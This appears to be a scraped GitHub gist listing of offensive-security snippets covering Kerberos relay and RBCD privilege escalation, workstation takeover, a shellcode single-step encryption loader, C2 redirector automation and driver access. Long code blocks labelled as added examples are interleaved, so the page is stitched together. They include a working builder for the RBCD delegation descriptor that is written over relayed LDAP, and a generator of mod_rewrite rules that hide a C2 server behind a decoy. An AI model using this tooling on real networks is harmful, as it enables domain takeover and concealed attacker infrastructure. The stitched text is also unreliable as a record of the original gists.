Hashim Jawad ihack4falafel

@NyaMisty
NyaMisty / outline_graph.py
Created September 1, 2022 01:02
IDA Graph view with outlined function included
"""
summary: drawing custom graphs
description:
Showing custom graphs, using `ida_graph.GraphViewer`. In addition,
show how to write actions that can be performed on those.
keywords: graph, actions
"""
from __future__ import print_function
# -----------------------------------------------------------------------
@tothi
tothi / krbrelay_privesc_howto.md
Last active August 24, 2024 03:19
Privilege Escalation using KrbRelay and RBCD

KrbRelay with RBCD Privilege Escalation HOWTO

Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.

TL;DR

No-Fix Local Privilege Escalation from low-privileged domain user to local system on domain-joined computers.

Prerequisites:

  • LDAP signing not required on Domain Controller (default!)
@ioncodes
ioncodes / Vagrantfile
Last active March 19, 2022 20:44
Spinning up Vagrant boxes for driver
Vagrant.configure("2") do |config|
  config.vm.guest = :windows # tell Vagrant this is a Windows-based guest
  config.vm.communicator = "winrm" # use winrm for management instead of ssh
  config.vm.provider 'vmware_workstation' do |p|
    p.linked_clone = false # full clone, so the driver box is independent of the base image
  end
  config.vm.provider :vmware_desktop do |p|
    p.vmx["ethernet0.pcislotnumber"] = "160"
  end
end
@jackullrich
jackullrich / mainc.c
Last active November 3, 2023 17:20
Single Step Encryption/Decryption
#include <Windows.h>
// Exception handler invoked on every single-step (trap flag) exception while the shellcode runs
LONG SingleStepEncryptDecrypt(EXCEPTION_POINTERS* ExceptionInfo);
typedef VOID(__stdcall* Shellcode)();
LPBYTE ShellcodeBuffer;       // executable buffer holding the shellcode
ULONG_PTR PreviousOffset;     // offset of the instruction that just executed
ULONG_PTR CurrentOffset;      // offset of the instruction about to execute
ULONGLONG InstructionCount;   // number of single-step exceptions handled so far
DWORD dwOld;                  // previous page protection returned by VirtualProtect
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active September 6, 2024 13:56
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
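Both the KrbRelay HOWTO above and this workstation takeover end the same way once the relayed machine authentication reaches LDAP: a security descriptor is written into the target computer's msDS-AllowedToActOnBehalfOfOtherIdentity attribute, naming the account that may act on behalf of other identities. The block below is an added example, not code from either gist, KrbRelay or impacket. It builds that self-relative descriptor in the layout impacket's rbcd.py writes (BUILTIN\Administrators as owner, a DS-revision DACL, one ACCESS_ALLOWED ACE with the 0x000F01FF full-control mask per delegating SID), parses an existing value back, and preserves pre-existing ACEs so that an earlier delegation is not clobbered. The account SIDs are constructed for the example.

```python
"""Build and parse the msDS-AllowedToActOnBehalfOfOtherIdentity security descriptor (RBCD)."""
import struct

# Field values from the MS-DTYP security descriptor format
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACL_REVISION_DS = 0x04             # ACL revision used for directory-service ACLs
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL_MASK = 0x000F01FF     # mask written by common RBCD tooling (983551)
ADMINISTRATORS_SID = "S-1-5-32-544"  # owner used for the new descriptor


def sid_to_bytes(sid):
    """Pack 'S-1-5-21-...' into its binary SID form."""
    parts = sid.split("-")
    assert parts[0] == "S" and parts[1] == "1", "not a SID string"
    authority = int(parts[2])
    subs = [int(x) for x in parts[3:]]
    return (struct.pack("<BB", 1, len(subs))
            + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(buf, off=0):
    """Unpack a binary SID at buf[off:]; returns (sid_string, size_in_bytes)."""
    rev, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    sid = "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs)
    return sid, 8 + 4 * count


def build_ace(sid, mask=FULL_CONTROL_MASK):
    """ACCESS_ALLOWED_ACE: type, flags, size, mask, then the trustee SID."""
    sid_b = sid_to_bytes(sid)
    return struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), mask) + sid_b


def build_dacl(aces):
    """ACL header (revision, sbz1, size, ace count, sbz2) followed by the ACEs."""
    body = b"".join(aces)
    return struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(body), len(aces), 0) + body


def parse_rbcd_sd(sd):
    """Return the SIDs holding ACCESS_ALLOWED ACEs, i.e. the accounts allowed to delegate."""
    _rev, _sbz, control, _owner, _group, _sacl, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if not (control & SE_DACL_PRESENT) or dacl_off == 0:
        return []
    _aclrev, _sbz1, _aclsize, ace_count, _sbz2 = struct.unpack_from("<BBHHH", sd, dacl_off)
    off = dacl_off + 8
    sids = []
    for _ in range(ace_count):
        ace_type, _flags, ace_size, _mask = struct.unpack_from("<BBHI", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(bytes_to_sid(sd, off + 8)[0])
        off += ace_size          # skip unknown ACE types by their declared size
    return sids


def build_rbcd_sd(allowed_sids, existing_sd=None):
    """Self-relative SD granting every SID in allowed_sids.

    If existing_sd (the attribute's current value) is given, the SIDs it already
    grants are kept, so a previous delegation survives the write.
    """
    sids = parse_rbcd_sd(existing_sd) if existing_sd else []
    for s in allowed_sids:
        if s not in sids:
            sids.append(s)
    owner = sid_to_bytes(ADMINISTRATORS_SID)
    dacl = build_dacl([build_ace(s) for s in sids])
    owner_off = 20                       # header is 20 bytes
    dacl_off = owner_off + len(owner)    # no group, no SACL
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         owner_off, 0, 0, dacl_off)
    return header + owner + dacl


if __name__ == "__main__":
    # Constructed SIDs: the attacker-controlled machine account, then a second one
    first = build_rbcd_sd(["S-1-5-21-1-2-3-1105"])
    second = build_rbcd_sd(["S-1-5-21-1-2-3-1106"], existing_sd=first)
    print(first.hex())
    print(parse_rbcd_sd(second))
```

The bytes returned by build_rbcd_sd are what gets written to the attribute over the relayed LDAP session; reading the current value and passing it as existing_sd is the difference between adding a delegation and silently removing someone else's. On the prerequisite side, the DC's LDAPServerIntegrity value under HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters is 2 when signing is required, which is what blocks the relay to plain LDAP.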

@mhaskar
mhaskar / Automated-Redirectors.py
Last active February 17, 2024 16:48
Python script to create HTTPS redirectors that point to your C2
#!/usr/bin/python
import requests
import json
import time
import paramiko
from Crypto.PublicKey import RSA
from os import chmod
public_key_name = "test1.key"
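A redirector that forwards every request to the team server exposes the C2 to whoever scans the redirector. What the provisioned host should carry is a rule set that proxies only traffic matching the implant's profile and sends everything else to a decoy. The following is an added example, not part of mhaskar's script: classify_request is the decision a redirector makes, and render_htaccess emits the equivalent Apache mod_rewrite rules. The backend address, decoy URL, URIs and User-Agent are assumed values standing in for a real profile.

```python
"""Request filtering for an HTTPS redirector: proxy profile traffic to C2, bounce the rest."""
import re

# Assumed values for the example; a real profile supplies these
C2_BACKEND = "https://10.0.0.5"               # internal team server behind the redirector
DECOY_URL = "https://www.example.com/"        # where non-matching traffic is sent
C2_URIS = ["/api/v1/status", "/updates/check"]  # URIs the implant beacons to
C2_USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"


def classify_request(path, user_agent):
    """Return 'c2' when path and User-Agent both match the profile, else 'decoy'."""
    uri_ok = any(path == u or path.startswith(u + "?") for u in C2_URIS)
    if uri_ok and user_agent == C2_USER_AGENT:
        return "c2"
    return "decoy"


def render_htaccess(c2_backend=C2_BACKEND, decoy=DECOY_URL, uris=C2_URIS, ua=C2_USER_AGENT):
    """Apache .htaccess implementing classify_request with mod_rewrite + mod_proxy."""
    uri_re = "^(" + "|".join(re.escape(u) for u in uris) + ")(\\?.*)?$"
    ua_re = "^" + re.escape(ua) + "$"
    lines = [
        "RewriteEngine On",
        # Both conditions must hold for the proxy rule to fire
        'RewriteCond %{REQUEST_URI} "' + uri_re + '"',
        'RewriteCond %{HTTP_USER_AGENT} "' + ua_re + '"',
        "RewriteRule ^.*$ " + c2_backend + "%{REQUEST_URI} [P,L]",
        # Anything that did not match above is redirected to the decoy
        "RewriteRule ^.*$ " + decoy + " [L,R=302]",
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(classify_request("/api/v1/status", C2_USER_AGENT))   # c2
    print(classify_request("/api/v1/status", "curl/8.0"))      # decoy
    print(render_htaccess())
```

The [P] flag needs mod_proxy and mod_proxy_http loaded, and SSLProxyEngine On when the backend is HTTPS; the generated file is what the provisioning script would drop onto the fresh redirector over SSH.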
@barbietunnie
barbietunnie / download-old-chrome-versions.md
Last active September 9, 2024 23:19
How to download old versions of Chrome

How to download old versions of Chrome

Click here to download old versions of Chrome for Linux, Mac and Windows.

The download_url field of the desired section houses the URL to the download.

Alternatively, for not too old versions, you can get it directly here.

# https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/
# https://twitter.com/richinseattle/status/1354296177743679489
# If the PowerShell check returns True, or a reg query returns without error, you are infected!
reg query 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig'
reg query 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverConfig'
reg query 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SSL Update'
[System.IO.File]::Exists('C:\Windows\System32\Nwsapagent.sys')
[System.IO.File]::Exists('C:\Windows\System32\helpsvc.sys')
@uf0o
uf0o / beep.cpp
Last active January 21, 2021 02:27
Usage of 'NtOpenFile' to access a device driver that doesn't export any symlink
#include <Windows.h>
#include <stdio.h>
#include <winternl.h>
#pragma comment(lib, "ntdll")
#define IOCTL_BEEP CTL_CODE(FILE_DEVICE_BEEP, 0, METHOD_BUFFERED, FILE_ANY_ACCESS)
typedef struct _BEEP_SETTINGS {
ULONG ulFrequency;
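The gist opens the beep device with NtOpenFile because, as its title says, the driver exports no symbolic link that CreateFile could resolve. As an added example (not the gist's code), the same open done from Python with ctypes: ctl_code reproduces the CTL_CODE macro so IOCTL_BEEP_SET can be checked offline, nt_open_device fills UNICODE_STRING and OBJECT_ATTRIBUTES for the native \Device\Beep path, and beep sends BEEP_SET_PARAMETERS (Frequency, Duration) through DeviceIoControl. Structure layouts follow winternl.h and ntddbeep.h; the access mask and share flags used for the open are assumptions, and the Windows-only parts refuse to run elsewhere.

```python
"""Open a device with no Win32 symlink via NtOpenFile on its native object path."""
import ctypes
import struct
import sys

# Constants from wdm.h / winioctl.h / winternl.h
FILE_DEVICE_BEEP = 0x00000001
METHOD_BUFFERED = 0
FILE_ANY_ACCESS = 0
OBJ_CASE_INSENSITIVE = 0x00000040
FILE_READ_DATA = 0x00000001
FILE_WRITE_DATA = 0x00000002
SYNCHRONIZE = 0x00100000
FILE_SHARE_READ = 0x00000001
FILE_SHARE_WRITE = 0x00000002
FILE_SYNCHRONOUS_IO_NONALERT = 0x00000020


def ctl_code(device_type, function, method, access):
    """CTL_CODE macro: DeviceType << 16 | Access << 14 | Function << 2 | Method."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


IOCTL_BEEP_SET = ctl_code(FILE_DEVICE_BEEP, 0, METHOD_BUFFERED, FILE_ANY_ACCESS)  # 0x10000


def beep_parameters(frequency_hz, duration_ms):
    """BEEP_SET_PARAMETERS {ULONG Frequency; ULONG Duration;} as beep.sys expects it."""
    return struct.pack("<II", frequency_hz, duration_ms)


class UNICODE_STRING(ctypes.Structure):
    _fields_ = [("Length", ctypes.c_uint16),        # bytes, without terminator
                ("MaximumLength", ctypes.c_uint16),
                ("Buffer", ctypes.c_wchar_p)]


class OBJECT_ATTRIBUTES(ctypes.Structure):
    _fields_ = [("Length", ctypes.c_uint32),
                ("RootDirectory", ctypes.c_void_p),
                ("ObjectName", ctypes.POINTER(UNICODE_STRING)),
                ("Attributes", ctypes.c_uint32),
                ("SecurityDescriptor", ctypes.c_void_p),
                ("SecurityQualityOfService", ctypes.c_void_p)]


class IO_STATUS_BLOCK(ctypes.Structure):
    # The Status/Pointer union is pointer-sized, so a single c_void_p keeps the layout
    _fields_ = [("Status", ctypes.c_void_p), ("Information", ctypes.c_void_p)]


def nt_open_device(native_path=u"\\Device\\Beep"):
    """Return a HANDLE to the device object (Windows only). Raises OSError on failure."""
    if sys.platform != "win32":
        raise OSError("NtOpenFile is only available on Windows")
    ntdll = ctypes.WinDLL("ntdll")
    name = UNICODE_STRING(len(native_path) * 2, (len(native_path) + 1) * 2, native_path)
    oa = OBJECT_ATTRIBUTES(ctypes.sizeof(OBJECT_ATTRIBUTES), None, ctypes.pointer(name),
                           OBJ_CASE_INSENSITIVE, None, None)
    iosb = IO_STATUS_BLOCK()
    handle = ctypes.c_void_p()
    # Access/share masks are an assumption for this example; adjust to what the driver accepts
    status = ntdll.NtOpenFile(ctypes.byref(handle),
                              FILE_READ_DATA | FILE_WRITE_DATA | SYNCHRONIZE,
                              ctypes.byref(oa), ctypes.byref(iosb),
                              FILE_SHARE_READ | FILE_SHARE_WRITE,
                              FILE_SYNCHRONOUS_IO_NONALERT)
    if status != 0:
        raise OSError("NtOpenFile failed: NTSTATUS 0x%08X" % (status & 0xFFFFFFFF))
    return handle.value


def beep(handle, frequency_hz=750, duration_ms=300):
    """Send IOCTL_BEEP_SET to an open beep device handle; returns True on success."""
    kernel32 = ctypes.WinDLL("kernel32")
    params = beep_parameters(frequency_hz, duration_ms)
    returned = ctypes.c_uint32()
    ok = kernel32.DeviceIoControl(ctypes.c_void_p(handle), IOCTL_BEEP_SET, params, len(params),
                                  None, 0, ctypes.byref(returned), None)
    return bool(ok)


if __name__ == "__main__":
    h = nt_open_device()
    print(beep(h))
```

The same nt_open_device call reaches any \Device\... object, which is why it matters for driver research: a device with no \DosDevices link is unreachable from CreateFile but not from the native API.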
@wumb0
wumb0 / PatchExtract.ps1
Last active September 18, 2024 03:05
extract Microsoft MSU files
<#
____ _ _
| _ \ __ _| |_ ___| |__
| |_) / _` | __/ __| '_ \
| __/ (_| | || (__| | | |
|_| \__,_|\__\___|_| |_|
_____ _ _
| ____|_ _| |_ _ __ __ _ ___| |_
| _| \ \/ / __| '__/ _` |/ __| __|